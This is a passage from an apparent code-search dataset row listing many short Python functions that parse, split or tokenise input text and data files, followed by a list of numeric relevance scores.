[]\n for line in data.strip().split(\"\\n\"):\n instruction = process_line(line)\n instructions.append(instruction)\n return instructions", "def parse_string(self, data):\n pass", "def split_data(lines_in):\n rows = []\n for line in lines_in:\n field = []\n\n for i in line.split(\"\\t\"):\n field.append(i)\n rows.append(field)\n\n rows = rows[1:] # strip header\n\n return rows", "def _data_normalization(data: list) -> list:\n\n return [ \n [\n d[0], # IP\n d[1], # Port\n Froxy._split_proxy_info(\n d[2].strip(' ') # Proxy Info\n ) \n ]\n for d in data\n ]", "def string_split_2d(data, field_delimiter=',', line_delimiter='\\n'):\n return [line.split(field_delimiter) for line in data.split(line_delimiter)]", "def parse_input(self, some_input):\n\n temp = []\n temp2 = []\n\n # breaks apart input\n for el in some_input:\n temp.append(el)\n\n if len(some_input) == 3:\n temp[1] = str(temp[1] + str(temp[2]))\n temp.pop()\n\n temp[1] = int(temp[1])\n\n # Checks boundries and input type before conversion\n dataValidation = [self.validate_move_input_and_bounderies(temp)]\n if False in dataValidation:\n print(\"Try Again\")\n return False\n\n temp2.append(self._row_conversion[temp[1]])\n temp2.append(self._col_conversion[temp[0]])\n\n return temp2", "def parse(day):\n data = Input(day).read().split('\\n')\n return [el for el in data if el != '']", "def parseInput(toParse):\n splitified = toParse.split('--------')\n statesPath = splitified[0].rstrip().strip()\n availableStates = len(splitified[1].rstrip().strip().split())\n probMatrix = splitified[2].rstrip().strip().splitlines()\n\n return(probMatrix, statesPath, availableStates)", "def parse_data(self, data):\n pids = set()\n cams = set()\n \n for info in data:\n pids.add(info[1])\n cams.add(info[2])\n return len(pids), len(cams)", "def parse_data(self, fileinput):\n with open(fileinput, 'rb') as fh:\n for line in fh:\n try:\n name, address, phone = line.strip().split(\",\")\n self.data.append(Document(name, address, phone))\n except Exception, ex:\n raise SerialException(\": Failed to parse input line %s: %s\" % (line, ex))\n return", "def 
_parser(data=\"\"):\r\n\r\n if data == \"\":\r\n pass\r\n \r\n \"\"\"Retrieve timestamp\"\"\"\r\n validate(data[:25])\r\n \"\"\"retrieve log data\"\"\"\r\n log_data = re.findall(r\"[\\w]+\", data)\r\n \"\"\"Retrieve user info\"\"\"\r\n login_info = [log_data[i] for i in (7, 9, 11, 13, 15)]\r\n\r\n \r\n return login_info, log_data", "def _parse(self, array):\n return [self._parse_note(x) for x in array]", "def prepare_data(self, data):\n # Break string into a list of sentances\n in_sentances = tokenize.sent_tokenize(data)\n out_sentances = list()\n for sentance in in_sentances:\n # Turn each word in sentance into its lemma\n lemmas = [self.lemmatizer.lemmatize(word) for word in sentance.split(\" \")]\n # Filters out all words that fail the is_valid_lemma function\n lemmas = [lemma for lemma in lemmas if self.is_valid_lemma(lemma)]\n # Joins words back together and add to list\n sentance = ' '.join(lemmas)\n out_sentances.append(sentance)\n return out_sentances", "def parse(\n data: str,\n raw: bool = False,\n quiet: bool = False\n) -> Dict:\n jc.utils.compatibility(__name__, info.compatible, quiet)\n jc.utils.input_type_check(data)\n\n raw_output: Dict = {}\n split_me = {'it_value:', 'it_interval:'}\n\n if jc.utils.has_data(data):\n\n for line in filter(None, data.splitlines()):\n\n # epoll files\n if line.startswith('tfd:'):\n line_match = re.findall(r'(?P<key>\\S+):(?:\\s+)?(?P<val>\\S+s*)', line)\n if line_match:\n raw_output.update({'epoll': {k.strip(): v.strip() for k, v in line_match}})\n continue\n\n # inotify files\n if line.startswith('inotify'):\n split_line = line[8:].split()\n raw_output['inotify'] = {}\n for item in split_line:\n k, v = item.split(':', maxsplit=1)\n raw_output['inotify'][k] = v\n continue\n\n # fanotify files\n if line.startswith('fanotify'):\n split_line = line[9:].split()\n\n if not 'fanotify' in raw_output:\n raw_output['fanotify'] = {}\n\n for item in split_line:\n k, v = item.split(':', maxsplit=1)\n raw_output['fanotify'][k] = v\n continue\n\n # timerfd files\n if line.split()[0] in split_me:\n split_line = line.replace(':', '').replace('(', '').replace(')', '').replace(',', '').split()\n raw_output[split_line[0]] = [int(x) for x in split_line[1:]]\n continue\n\n key, val = line.split(':', maxsplit=1)\n raw_output[key.strip()] = val.strip()\n continue\n\n return raw_output if raw else _process(raw_output)", "def parse(\n data: str,\n raw: bool = False,\n quiet: bool = False\n) -> List[Dict]:\n jc.utils.compatibility(__name__, info.compatible, quiet)\n jc.utils.input_type_check(data)\n\n raw_output: List = []\n\n if jc.utils.has_data(data):\n\n cleandata = list(filter(None, data.splitlines()))\n cleandata[0] = cleandata[0].replace('#', 'num_')\n raw_output = simple_table_parse(cleandata)\n\n return raw_output if raw else _process(raw_output)", "def processInputData(self, unformattedData):\n tempList = unformattedData.split('\\n')\n rawNodes = copy.copy(list(self.filterRawNodes(tempList)))\n self.vertices = self.createVertices(rawNodes)\n self.edges = self.createEdges(rawNodes, self.vertices)\n self.createEdgesList(rawNodes, self.vertices)", "def datareader(self, path):\n\n f = open(path, 'r')\n data = f.read()\n data = data.split('\\n')\n data_tmp = []\n for idx in range(len(data)):\n if str(data[idx]).find('@data') >= 0:\n data_tmp = data[idx + 1:]\n break\n res = []\n for record in data_tmp:\n record = record.split(',')\n record = map(float, record)\n res.append(record)\n return res", "def parse(input):\n return [l.strip() for l in input.splitlines() if 
l.strip()]", "def parse_input_2() -> List[int]:\n with open(\"./data/day_13.txt\", \"r\") as f:\n lines = [\n int(n) if re.match(\"^\\d+\", n) else 1 for line in f for n in line.split(\",\")\n ]\n return lines[1:]", "def process(raw):\n entry = { }\n cooked = [ ]\n\n for line in raw:\n line = line.strip()\n if len(line) == 0 or line[0]==\"#\" :\n continue\n parts = line.split(';')\n if len(parts) == 3:\n entry[\"description\"] = parts[0].strip() #adding key and values to the dict\n entry[\"long\"] = parts[1].strip()\n entry[\"lat\"] = parts[2].strip()\n cooked.append(entry) #add this dict entry into the array\n entry = { }\n continue\n else:\n raise ValueError(\"Trouble wiht line: '{}'\\n\".format(line))\n \n return cooked #returning an array of dicts", "def parse_file(input_file):\n \n all_lines = input_file.split('\\n')\n all_info_list = []\n for line in all_lines:\n line = line.split('\\t')\n info_per_row_list = []\n for value in line:\n my_string = \"\"\n value = value.strip('\\'\"')\n if len(value) == 0:\n value = \"NA\"\n my_string += value\n info_per_row_list += [my_string]\n all_info_list += [info_per_row_list]\n return all_info_list", "def parse(\n data: str,\n raw: bool = False,\n quiet: bool = False\n) -> List[Dict]:\n jc.utils.compatibility(__name__, info.compatible, quiet)\n jc.utils.input_type_check(data)\n\n raw_output: List = []\n rows: List = []\n this_row: str = ''\n headers: str = ''\n\n if jc.utils.has_data(data):\n\n for line in filter(None, data.splitlines()):\n row_name, header_data = line.split(':', maxsplit=1)\n\n if row_name in rows:\n # this is data\n _, row_data = line.split(':', maxsplit=1)\n data_table = headers + row_data\n output_line = simple_table_parse(data_table.splitlines())\n output_line[0]['type'] = this_row\n raw_output.extend(output_line)\n continue\n\n else:\n # this is a header row\n rows.append(row_name)\n this_row = row_name\n headers = header_data + '\\n'\n continue\n\n return raw_output if raw else _process(raw_output)", "def parse_data(name):\n with open(name) as f:\n lines = f.read().splitlines()\n lines = filter(lambda x: x.split(' ')[0].isdigit(), lines)\n lx = [int(p.split(' ')[1]) for p in lines]\n ly = [int(p.split(' ')[2]) for p in lines]\n return lx, ly", "def parseArray(self, data):\n self.title = data[0]\n self.director = data[1]\n self.cast = data[2]\n self.producer = data[3]\n self.writer = data[4]\n self.country = data[5]\n self.language = data[6]\n self.year = data[7]\n self.genres = data[8]\n self.votes = data[9]\n self.rating = float(data[10])\n self.runtime = data[11]\n self.plot = data[12]\n self.coverUrl = data[13]", "def extract_values(self, data):\n result = []\n for i in data:\n if(len(i) < 2):\n raise ValueError(\"Length of input list is less than 2!\")\n result.append(i[1])\n return result", "def parse_input():\n carts = []\n tracks = []\n with open('input') as f:\n for line in f:\n line = line.rstrip()\n track = []\n for i, c in enumerate(line):\n if c not in ('<', '>', '^', 'v'):\n char = c\n else:\n if i != 0 and tracks and i < len(tracks[-1]) and \\\n tracks[-1][i] in ('|', '+') and \\\n line[i-1] in ('-', '+'):\n char = '+'\n else:\n if c in ('<', '>'):\n char = '-'\n else:\n char = '|'\n carts.append((len(tracks), i, c, 0))\n track.append(char)\n tracks.append(track)\n\n heapify(carts)\n return tracks, carts", "def _parse_data(self, data):\n return data.get('rows', [])", "def parse_data(data):\n\n # Note that the data will be in ASCII at this point\n source_client = data[3:33]\n dest_client = data[33:63]\n 
request_verb = data[63:66]\n message = data[256:]\n\n # We want to decode everything before we use the string values in future code\n return source_client.decode(\"utf-8\").strip(), dest_client.decode(\"utf-8\").strip(), \\\n request_verb.decode(\"utf-8\").strip(), message.decode(\"utf-8\").strip()", "def split_records(data, delimiter=r\"\\r\\n\"):\n # https://stackoverflow.com/a/2787979\n return re.split(delimiter + \"\"\"(?=(?:[^'\"]|'[^']*'|\"[^\"]*\")*$)\"\"\", data)", "def parse_products(self, infile):\r\n raise NotImplementedError()", "def extract(self, data):", "def Get_Parses(data):\n parses = []\n sentences = []\n parse_num = -1\n new_flag = True\n for line in data:\n if line == \"\\n\":\n # get rid of sentences with no links\n new_flag = True\n continue\n if new_flag:\n new_flag = False\n curr_sent = line.split()\n if curr_sent[0] == \"###LEFT-WALL###\":\n curr_sent.pop(0)\n sentences.append(curr_sent)\n parses.append([])\n parse_num += 1\n continue\n parses[parse_num].append(line.split())\n\n return parses, sentences", "def parse_input_1() -> List[int]:\n with open(\"./data/day_13.txt\", \"r\") as f:\n lines = [int(n) for line in f for n in line.split(\",\") if re.match(\"^\\d+\", n)]\n return lines", "def _split_proxy_info(data: str) -> list:\n \n country = data[:2]\n anonymity = data[3:4]\n type_ = data[4:].strip('-+ ') # Remove splitting (- and space) and google_passed flag (+)\n google_passed = data[-1]\n\n return [country, anonymity, type_, google_passed]", "def input_from_line(line, char_to_id):\n line = _full_to_half(line)\n line = _replace_html(line)\n inputs = list()\n inputs.append([line])\n line.replace(\" \", \"$\")\n inputs.append([[char_to_id[char] if char in char_to_id else char_to_id[\"<UNK>\"]\n for char in line]])\n inputs.append([_get_seg_features(line)])\n inputs.append([[]])\n return inputs", "def parse_grid(self, data):\n return [list(row) for row in data.strip().split(\"\\n\")]", "def split():\n str_list = sys.stdin.readlines()\n element_list = list()\n\n for line in str_list:\n element_list.extend(split_line(line.rstrip()))\n\n for element in element_list:\n print(element)", "def parse_df(data):\n\n # First column should be the ids\n ids = list(data.iloc[:, 0])\n\n # Second column should hold the labels\n labels = list(data.iloc[:, 1])\n\n # From third columns, we should have the features\n features = list(data.iloc[:, 2:].values)\n\n return ids, labels, features", "def extract(input_data: str) -> list:\n instructions = list()\n for instruction in input_data.split('\\n'):\n op, arg = instruction.split(' ')\n arg = int(arg)\n assert op in ('acc', 'jmp', 'nop')\n instructions.append(Instruction(op, arg))\n return instructions", "def parse(self):", "def extract_data(sentence, start_str):\n pos = sentence.find(start_str)\n if pos == -1:\n return None\n if pos + len(start_str) == len(sentence) - 1:\n return []\n items = sentence[pos + (len(start_str) + 1):].split(',')\n return list(map(lambda x: x.lstrip(), items))", "def get_tokenized_data(data):\r\n \r\n # Get the sentences by splitting up the data\r\n sentences = split_to_sentences(data)\r\n \r\n # Get the list of lists of tokens by tokenizing the sentences\r\n tokenized_sentences = tokenize_sentences(sentences)\r\n \r\n \r\n return tokenized_sentences", "def _parsecsv(x):\n for line in x:\n # decode as utf-8, whitespace-strip and split on delimiter\n yield line.decode('utf-8').strip().split(config.DELIMITER)", "def split_data(msg, expected_fields):\r\n\tmsg_split = msg.split(DATA_DELIMITER)\r\n\tif 
len(msg_split) == expected_fields:\r\n\t\treturn msg_split\r\n\treturn []", "def parse_string_list(data):\n txt = data.decode()\n x = ast.literal_eval(txt)\n return x", "def transform_input(data: str) -> Matrix:\n return [\n list(map(int, list(row)))\n for row in data.split('\\n')\n ]" ]
[ "0.6394949", "0.6299175", "0.6273174", "0.62510943", "0.6217176", "0.62149054", "0.6148983", "0.61309695", "0.6124276", "0.6101856", "0.60483354", "0.5908739", "0.5896337", "0.588902", "0.587758", "0.58742684", "0.5872623", "0.5748684", "0.57401425", "0.57069176", "0.5701802", "0.5689349", "0.5685283", "0.5682524", "0.566895", "0.566827", "0.5655468", "0.5650751", "0.5650112", "0.5642615", "0.5638842", "0.5620007", "0.55991566", "0.5594632", "0.5593483", "0.55770665", "0.55749243", "0.5562104", "0.5560864", "0.55585235", "0.55550784", "0.5544537", "0.55380666", "0.5532915", "0.55160624", "0.5512381", "0.5510513", "0.5486617", "0.54797256", "0.5477001", "0.54747564", "0.5469754", "0.5469742", "0.5457851", "0.5451118", "0.54452044", "0.5437709", "0.5417147", "0.54159397", "0.5410328", "0.5405289", "0.5400153", "0.53973603", "0.5385922", "0.5367375", "0.5363574", "0.53621817", "0.533885", "0.53350717", "0.5330304", "0.5318171", "0.5312752", "0.5311315", "0.5309263", "0.53075325", "0.53013253", "0.5299226", "0.5298995", "0.5298714", "0.52976006", "0.52966535", "0.52954555", "0.52903134", "0.5286515", "0.5286078", "0.52840763", "0.5283312", "0.52831113", "0.5279747", "0.5262333", "0.5262013", "0.52575874", "0.52521825", "0.52446395", "0.52427083", "0.5238558", "0.52342975", "0.5233036", "0.5231848", "0.52293366", "0.5228925" ]
0.0
-1
Return elements from the iterable until it is exhausted. Then repeat the sequence indefinitely. cycle(seq) ==> seq[0], seq[1], ..., seq[n-1], seq[0], seq[1], ...
def cycle(seq, n=None):
    if n is not None:
        return Iter(_ncycle(n, seq))
    return Iter(itertools.cycle(seq))
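A minimal usage sketch of the behavior described above, assuming `Iter` is a thin iterator wrapper and `_ncycle(n, seq)` is a helper (not shown in this row) that repeats a re-iterable sequence n times:

import itertools

def _ncycle(n, seq):
    # Assumed helper: repeat a re-iterable sequence n times, element by element.
    for _ in range(n):
        yield from seq

print(list(itertools.islice(itertools.cycle("AB"), 5)))  # ['A', 'B', 'A', 'B', 'A']
print(list(_ncycle(2, [1, 2])))                          # [1, 2, 1, 2]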
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def cycle(iterator: Iterable[Any]) -> Iterable[Any]:\n while True:\n yield from iterator", "def iter_sequence_infinite(seq):\n while True:\n for item in seq:\n yield item", "def repeat(seq, n):\n for e in seq:\n for _ in range(n):\n yield e", "def repeat(iterable, count=None):\n if count is None:\n while True:\n for sample in iterable:\n yield sample\n else:\n for i in range(count):\n for sample in iterable:\n yield sample", "def pick(iterable):\n for element in iterable:\n yield element\n while True:\n yield element", "def cycle(obj):\r\n while True:\r\n for item in obj:\r\n yield item", "def forever(iterable):\n it = iter(iterable)\n while True:\n try:\n yield next(it)\n except Exception as e:\n print(e)\n it = iter(iterable)", "def simple_seq(seq):\n for i in seq:\n yield i", "def repeatedly(func, /, *args, **kwargs):\n func = to_callable(func)\n try:\n while True:\n yield func(*args, **kwargs)\n except StopIteration as e:\n yield from stop_seq(e)", "def forever():\n\n def animate(thing):\n thing = list(thing)\n yield from repeat(thing)\n return animate", "def color_cycle():\n while True:\n for color in colors:\n yield color", "def take(n, seq):\n seq = iter(seq)\n result = []\n try:\n for i in range(n):\n result.append(next(seq))\n except StopIteration:\n pass\n return result", "def loop(self):\n yield self\n e = self.next\n while e is not self:\n yield e\n e = e.next", "def eat(seq, n=None):\n if n is None:\n collections.deque(seq, maxlen=0)\n else:\n next(itertools.islice(seq, n, n), None)", "def cycle(effect):\n\n def animate(thing):\n frames = (list(frame) for frame in effect(thing))\n yield from cycle(frames)\n return animate", "def repeat(fun, n):\n for i in range(n):\n yield fun()", "def cycles(n, support, randomize=False):\n support = np.array(support)\n\n def gen(p):\n g = combinations(support, n)\n if randomize:\n g = list(g)\n random.shuffle(g)\n\n for local_support in g:\n for output_p in all_permutations(local_support)(p):\n yield output_p\n\n return gen", "def takeNGenerator(seq, n):\n\tindex = 0\n\twhile index + n <= len(seq):\n\t\tyield seq[index:index + n]\n\t\tindex = index + 1", "def repeat(obj, times=None):\n if times is None:\n return Iter(itertools.repeat(obj))\n return Iter(itertools.repeat(obj, times))", "def iter_n(sequence: Sequence[T], n: int) -> List[T]:\n\t\n\tfor i in range(len(sequence) - (n-1)):\n\t\tyield sequence[i:i+n]", "def iterate(iterator, n):\n # throw away n-1 elements\n for index in range(1, n):\n next(iterator, None)\n\n return next(iterator, None)", "def __iter__(self):\n for x in self.seq: yield x", "def __iter__(self):\n while True:\n for item in (self[i] for i in range(len(self))):\n yield item", "def random_iterator(seq:Sequence[Any], maxlen=None) -> Any:\n if not hasattr(seq, \"__len__\") or not hasattr(seq, \"__getitem__\"):\n raise TypeError(\"Sequence must be indexable\")\n N = len(seq)\n order = list(range(N))\n random.shuffle(order)\n for i,j in enumerate(cycle(order)):\n if maxlen is not None and i > maxlen:\n return\n yield seq[j]", "def just(n, seq):\n it = iter(seq)\n for _ in range(n - 1):\n yield next(it, None)\n yield tuple(it)", "def _cycle_loop(self):\n cycle, idx = self.cycling, self.current_idx # Local copy to avoid race condition updates\n\n if cycle: # Iterate to next command\n idx = (idx+1) % len(self)\n self.current_idx = idx\n self.updated = True\n\n time.sleep(self.cycle_interval)", "def iterate(func, x):\n while True:\n x = func(x)\n yield x", "def intersperse(value, seq):\n seq = iter(seq)\n\n try:\n yield 
next(seq)\n except StopIteration:\n return\n\n for item in seq:\n yield value\n yield item", "def roll(self):\n try:\n for s in self.seq:\n yield s\n except StopIteration as si:\n # You called roll after using up the sequence. return None\n return None", "def infinite_odd_generator():\n current = 1\n while True:\n yield current\n current = current + 2", "def generator_wrapper(iterable):\n\n num_items = len(iterable)\n for idx in range(num_items):\n yield iterable[idx]", "def every_other(seq):\n seq = seq[::2]\n return seq", "def forever(shard):\n def repeat(*args, **kwargs):\n while True:\n for delay in shard(*args, **kwargs):\n yield delay\n return repeat", "def __iter__(self):\n return iter(range(1, self.size() + 1))", "def next_n(iterator, N):\n try:\n items = []\n for _ in range(N):\n items.append(next(iterator))\n return items\n except StopIteration:\n if items:\n return items\n return None", "def permutations(iterable, r=None):\n pool = tuple(iterable)\n n = len(pool)\n if r is None:\n r = n\n indices = list(range(n))\n cycles = list(range(n-r+1, n+1))[::-1]\n yield tuple(pool[i] for i in indices[:r])\n while n:\n for i in reversed(list(range(r))):\n cycles[i] -= 1\n if cycles[i] == 0:\n indices[i:] = indices[i+1:] + indices[i:i+1]\n cycles[i] = n - i\n else:\n j = cycles[i]\n indices[i], indices[-j] = indices[-j], indices[i]\n yield tuple(pool[i] for i in indices[:r])\n break\n else:\n return", "def cons(el, seq):\n yield el\n for s in seq:\n yield s", "def group(seq, size):\n if not hasattr(seq, 'next'):\n seq = iter(seq)\n while True:\n yield [seq.next() for i in xrange(size)]", "def every_other(seq):\n every_other = seq[::2]\n return every_other", "def chunk(iterable: Iterable[A], n: int) \\\n -> Iterable[more_itertools.more.peekable]:\n iterator = iter(iterable)\n while True:\n chunk_ = more_itertools.peekable(itertools.islice(iterator, n))\n try:\n chunk_.peek()\n except StopIteration:\n return\n yield chunk_", "def make_iter(capture, channel):\n\n def cycle():\n threading.Timer(INTERVAL, cycle).start()\n publish_frame(capture, channel)\n\n return cycle", "def product(*iterables, **kwargs):\n if len(iterables) == 0:\n yield ()\n else:\n iterables = iterables * kwargs.get('repeat', 1)\n it = iterables[0]\n for item in it() if callable(it) else iter(it):\n for items in product(*iterables[1:]):\n yield (item, ) + items", "def iterate(f, x):\n while True:\n yield x\n x = f(x)", "def cyclic(length = None, alphabet = None, n = None):\n if n is None:\n n = context.cyclic_size\n\n if alphabet is None:\n alphabet = context.cyclic_alphabet\n\n if length is not None and len(alphabet) ** n < length:\n log.error(\"Can't create a pattern length=%i with len(alphabet)==%i and n==%i\",\n length, len(alphabet), n)\n\n generator = de_bruijn(alphabet, n)\n out = iters.take(length, generator)\n\n return _join_sequence(out, alphabet)", "def _iterate(self, start=None, use_repetitions=True):\r\n path = start and start.path or [] # path to start\r\n multiple = start and start.multiple or [-1] # multiple to start\r\n\r\n elements = [] # a stack of elements\r\n cur = self.root # current element\r\n index = 0 # the next child element to examine\r\n \r\n def get_repetitions(element):\r\n \"\"\"Return the number of times an element is repeated.\"\"\"\r\n return int(element.attrib.get('repeat', 1))\r\n \r\n # go to start\r\n for i in path:\r\n elements.append(cur)\r\n cur = cur[i]\r\n multiple[-1] += 1\r\n\r\n try:\r\n while True:\r\n repetitions = get_repetitions(cur)\r\n if multiple[-1] >= repetitions and 
repetitions != 0:\r\n index = path.pop() + 1\r\n multiple.pop()\r\n cur = elements.pop()\r\n elif len(cur) == 0:\r\n yield Moment(cur.get('name'), cur.get('descr'), copy(path), copy(multiple))\r\n multiple[-1] += 1\r\n elif index < len(cur):\r\n path.append(index)\r\n multiple.append(0)\r\n elements.append(cur)\r\n cur = cur[index]\r\n index = 0\r\n if not use_repetitions: multiple[-1] = get_repetitions(cur) - 1\r\n else:\r\n multiple[-1] += 1\r\n index = 0\r\n except IndexError:\r\n pass # iteration is done\r", "def repeated_iteration(self) -> global___Statement.Iteration.RepeatedIteration:", "def group(n, iterable, fill_value = None):\n args = [iter(iterable)] * n\n return izip_longest(fillvalue = fill_value, *args)", "def __iter__(self):\n i = self.head\n while True:\n if not i:\n break\n yield i\n i = i.next\n if not i:\n break", "def __iter__(self) -> Generator:\r\n yield from self.sequence", "def __iter__(self):\n while True:\n if self.stop:\n return\n for item in self.get_next_batch():\n yield item", "def every_other(seq):\n return seq[::2]", "def consume(iterator, n=None, next=next, islice=islice, deque=deque):\n if n is not None:\n next(islice(iterator, n, n), None)\n else:\n exhaust(iterator)", "def __iter__(self):\n cursor = self.first()\n while cursor is not None:\n yield cursor.element()\n cursor = self.after(cursor)", "def scan(func, iterable, start=_EMPTY, *, echo_start=True):\n it = iter(iterable)\n if start is _EMPTY:\n start = next(it)\n if echo_start:\n yield start\n for item in it:\n start = func(start, item)\n yield start", "def roundrobin(*iterables):\n # Recipe credited to George Sakkis\n pending = len(iterables)\n nexts = cycle(iter(it).next for it in iterables)\n while pending:\n try:\n for next in nexts:\n yield next()\n except StopIteration:\n pending -= 1\n nexts = cycle(islice(nexts, pending))", "def caboose(seq: Iterable[TItem], el: TElement) -> Iterable[Union[TElement, TItem]]:\n yield from seq\n yield el", "def e_seq():\n yield 2;\n for n in count(2, 2):\n yield 1\n yield n\n yield 1", "def iterslices(iterable, n, pad_last=False, pad_value=None):\n current = []\n for a in iterable:\n current.append(a)\n if len(current) == n:\n yield current\n current = []\n if current:\n if pad_last:\n current += [pad_value] * (n-len(current))\n yield current", "def chunks(seq: Sequence[T], n: int) -> Iterator[Sequence[T]]:\n for i in range(0, len(seq), n):\n yield seq[i:i + n]", "def _cycle_through_pieces(self, piece_list):\n number_of_pieces = len(piece_list)\n if number_of_pieces > 0:\n animation_length = 3\n cycle_length = number_of_pieces * animation_length\n current_animation_frame = frame.current_frame % cycle_length\n return piece_list[int(current_animation_frame / animation_length)]\n return piece_list[0]", "def all_cycles_iterator(self, starting_vertices=None, simple=False,\n rooted=False, max_length=None, trivial=False):\n if starting_vertices is None:\n starting_vertices = self\n # Since a cycle is always included in a given strongly connected\n # component, we may remove edges from the graph\n sccs = self.strongly_connected_components()\n d = {}\n for id, component in enumerate(sccs):\n for v in component:\n d[v] = id\n h = copy(self)\n h.delete_edges([ (u,v) for (u,v) in h.edge_iterator(labels=False)\n if d[u] != d[v] ])\n # We create one cycles iterator per vertex. 
This is necessary if we\n # want to iterate over cycles with increasing length.\n vertex_iterators = dict([(v, h._all_cycles_iterator_vertex( v\n , starting_vertices=starting_vertices\n , simple=simple\n , rooted=rooted\n , max_length=max_length\n , trivial=trivial\n , remove_acyclic_edges=False\n )) for v in starting_vertices])\n cycles = []\n for vi in vertex_iterators.values():\n try:\n cycle = next(vi)\n cycles.append((len(cycle), cycle))\n except(StopIteration):\n pass\n # Since we always extract a shortest path, using a heap\n # can speed up the algorithm\n from heapq import heapify, heappop, heappush\n heapify(cycles)\n while cycles:\n # We choose the shortest available cycle\n _, shortest_cycle = heappop(cycles)\n yield shortest_cycle\n # We update the cycle iterator to its next available cycle if it\n # exists\n try:\n cycle = next(vertex_iterators[shortest_cycle[0]])\n heappush(cycles, (len(cycle), cycle))\n except(StopIteration):\n pass", "def __iter__(self):\n for i in range(self.n):\n yield self.get(i, i + 1)", "def take(n, seq):\n return itertools.islice(seq, n)", "def advance(self):\n elem = next(self._iterable)\n for deque in self._deques:\n deque.append(elem)", "def lookahead(n, iterable):\n for value in islice(copy.copy(iterable), n, None):\n return value\n raise IndexError(n)", "def __next__(self):\n self._k += 1\n if self._k < len(self._seq):\n return(self._seq[self._k])\n else:\n # print('*** End of iteration. ***')\n raise StopIteration()", "def get_consistent_generator(iterable):\n try:\n first = next(iterable)\n except StopIteration:\n return None\n\n if first is None:\n return None\n\n return itertools.chain([first], iterable)", "def next(self):\n return self.cycle.next()", "def roundrobin_generators(*iterables):\n sentinel = object()\n return (item\n for item in itertools.chain.from_iterable(\n zip_longest(*iterables, fillvalue=sentinel))\n if item is not sentinel)", "def powerset(seq):\n if len(seq) <= 1:\n yield seq\n yield []\n else:\n for item in powerset(seq[1:]):\n yield [seq[0]]+item\n yield item", "def powerset(seq):\n if len(seq) <= 1:\n yield seq\n yield []\n else:\n for item in powerset(seq[1:]):\n yield [seq[0]]+item\n yield item", "def powerset(seq):\n if len(seq) <= 1:\n yield seq\n yield []\n else:\n for item in powerset(seq[1:]):\n yield [seq[0]]+item\n yield item", "def next_n(self, n, fast_forward=False):\n return list(it.islice(self.gen, n))", "def progression(first_item:int, amount:int,func):\n item = first_item\n count = 0\n stop = False\n while count < amount and not stop:\n stop = yield item\n item = func(item)\n count += 1", "def sentinelize(inputSeq, sentinel=None, loopSentinel=False, failFun=None):\n for item in inputSeq:\n yield item\n yield sentinel\n while loopSentinel:\n yield loopSentinel\n if failFun:\n failFun()", "def consume(iterator, n=None):\n # Use functions that consume iterators at C speed.\n if n is None:\n # feed the entire iterator into a zero-length deque\n collections.deque(iterator, maxlen=0)\n else:\n # advance to the empty slice starting at position n\n next(islice(iterator, n, n), None)", "def full_nloop_iterator(self, start=None, length=1):\n from itertools import ifilter, imap\n\n g = self.path(start)\n\n ifull = ifilter(\n lambda x: x.is_loop() and x.is_full(),\n self._all_npath_extension(g,length))\n\n return imap(copy, ifull)", "def batch(\n iterable: Iterable[_T], n: int\n) -> Generator[tuple[_T, ...], None, None]:\n iterator = iter(iterable)\n while True:\n try:\n # Unnecessary list here, but a generator 
won't raise StopIteration,\n # instead it will raise RuntimeError: \"generator raises StopIteration\".\n # I'd rather have a list comprehension in place of a generator expression\n # than catch RuntimeError and have to inspect the payload to verify it's\n # the one I want to be catching.\n yield tuple([next(iterator) for _ in range(n)])\n except StopIteration:\n return", "def range(self, n):\n for i in range(n):\n yield self.get()", "def batch(iterable, size):\n sourceiter = iter(iterable)\n while True:\n batchiter = islice(sourceiter, size)\n yield list(chain([batchiter.next()], batchiter))", "def _next(self):\n i = 0\n while i < self.size:\n yield self.data[i]\n i += 1", "def consume(iterator, n=None):\n # Use functions that consume iterators at C speed.\n if n is None:\n # feed the entire iterator into a zero-length deque\n deque(iterator, maxlen=0)\n else:\n # advance to the empty slice starting at position n\n next(islice(iterator, n, n), None)", "def sequences(self):\n # i am one\n yield self\n # nothing further\n return", "def infinite_increment():\n i = 0\n while 1:\n yield i\n i += 1", "def PeekIterable(iterable):\n try:\n head_element = iterable.next()\n new_iterable = itertools.chain([head_element], iterable)\n return head_element, new_iterable\n except StopIteration:\n return None, iterable", "def interleave(*seqs):\n queue = deque(iter(seq) for seq in seqs)\n\n while queue:\n seq = queue.popleft()\n\n try:\n yield next(seq)\n except StopIteration:\n pass\n else:\n queue.append(seq)", "def odd_generator(limit):\n current = 1\n while current < limit:\n yield current\n current = current + 2", "def iter_py():\n s = \"Hello, World!\"\n it = iter(s)\n while True:\n try:\n print(next(it))\n except:\n break\n\n ## Output\n # H\n # e\n # l\n # l\n # o\n # ,\n #\n # W\n # o\n # r\n # l\n # d\n # !", "def iter(self):\n s = self.first\n while True:\n yield s\n s = s.__next__\n if s == self.first:\n return", "def cons(element, sequence):\n yield element\n for s in sequence:\n yield s", "def chunks(iterable: Iterable, n: int = 1000, cls: Type = list) -> Generator:\n\n it = iter(iterable)\n while True:\n chunked = itertools.islice(it, n)\n try:\n first_element = next(chunked)\n except StopIteration:\n return\n yield cls(itertools.chain((first_element,), chunked))", "def limit(iterable, n):\n for count, element in enumerate(iterable):\n if count >= n: break\n else: yield element", "def window(seq, size=2, stride=1):\n it = iter(seq)\n result = []\n for elem in it:\n result.append(elem)\n if len(result) == size:\n yield result\n result = result[stride:]", "def iwindow(seq, n):\n it = iter(seq)\n result = tuple(islice(it, n))\n\n if len(result) == n:\n yield result\n\n for elem in it:\n result = result[1:] + (elem,)\n yield result", "def __iter__(self):\n for i in range(len(self)):\n yield self[i]", "def __iter__(self):\n for i in range(len(self)):\n yield self[i]", "def repeatfunc(func, n, *args):\n return starmap(func, repeat(args, n))", "def grouper( n, iterable, fillvalue=None ):\n args = [iter(iterable)]*n\n return list( it.izip_longest(fillvalue=fillvalue, *args) )", "def interleave(seqs, pass_exceptions=()):\n iters = map(iter, seqs)\n while iters:\n newiters = []\n for itr in iters:\n try:\n yield next(itr)\n newiters.append(itr)\n except (StopIteration,) + tuple(pass_exceptions):\n pass\n iters = newiters", "def cycles_to_seq(*cycles):\n perm = {}\n for cycle in cycles:\n perm.update({cycle[i]: cycle[(i + 1) % len(cycle)] for i in range(len(cycle))})\n seq = [perm.get(i, i) for i in 
range(8)]\n return tuple(seq)" ]
